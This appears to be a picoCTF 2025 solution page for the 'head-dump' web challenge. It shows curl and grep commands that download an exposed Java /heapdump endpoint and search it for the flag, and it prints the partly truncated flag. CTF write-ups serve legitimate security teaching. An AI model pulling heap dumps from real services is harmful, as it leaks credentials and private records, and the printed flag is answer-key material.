picoCTF Solutions
picoCTF 2025Web ExploitationEasy

head-dump

Published: April 2, 2025Updated: December 9, 2025

Description

The picoCTF News blog exposes an API reference that includes a /heapdump endpoint. Download the Java heap dump and search it for picoCTF.

Setup

Open picoCTF News

Navigate to the API Documentation article and scroll to the entry describing /heapdump.

Use the built-in “Try it out” or run curl manually to download the heap dump file.

curl http://verbal-sleep.picoctf.net:63972/heapdump -o heapdump
grep -a picoCTF heapdump

Solution

  1. Step 1Hit the hidden endpoint
    The open actuator endpoint dumps the JVM heap (`/heapdump`). Requesting it returns megabytes of binary data.
  2. Step 2Search the dump
    Use `grep -a picoCTF heapdump` (or strings) to carve the flag string out of the heap. It appears near a JSON blob describing patient records.

Flag

picoCTF{Pat!3nt_15_Th3_K3y_ad7e...}

No authentication or decoding needed; just download and search the dump.